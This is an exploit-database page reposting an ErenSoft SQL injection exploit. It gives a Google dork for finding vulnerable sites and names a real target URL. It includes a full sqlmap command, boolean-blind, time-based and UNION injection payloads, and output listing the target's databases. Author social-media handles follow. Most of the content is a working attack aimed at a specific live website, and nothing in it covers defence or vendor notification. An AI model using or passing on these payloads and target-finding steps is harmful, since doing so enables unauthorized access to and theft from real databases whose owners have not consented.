Advertisement






ErenSoft SQL Injection

CVE Category Price Severity
CWE-89 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2023-07-23
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023070056

Below is a copy:

ErenSoft SQL Injection
#Exploit Title: ErenSoft SQL Injection Vulnerable
#Date: 22.07.2023
#Exploit Author: EFETR
#Google Dork: intext:"Kodlama: Erensoft"
#Vendor Homepage: http://www.erensoft.com/
#Category: SQL Injection
#Tested On: Windows 10
------------------------------------------------
Target Url: http://alaaddinpalevi.com/videoseyret.php?id=95
Sqlmap Payload: ./sqlmap.py -u http://alaaddinpalevi.com/videoseyret.php?id=95 --risk=3 --level=5 --random-agent --batch --dbs
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=95 AND 9464=9464

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=95 AND (SELECT 4581 FROM (SELECT(SLEEP(5)))NyiX)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: id=95 UNION ALL SELECT NULL,NULL,CONCAT(0x716a7a7671,0x774d78456f776471475478595372784f4e4779764b456543477161656868556a6e4c6f6f6f71654f,0x71787a7871),NULL,NULL,NULL,NULL-- -
---
available databases [2]:
[*] hdralaad_data
[*] information_schema

*********************************************************
#Telegram: @lstanbulSiber
#Instagram: @efetr.php
#Mail: [email protected]
*********************************************************

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.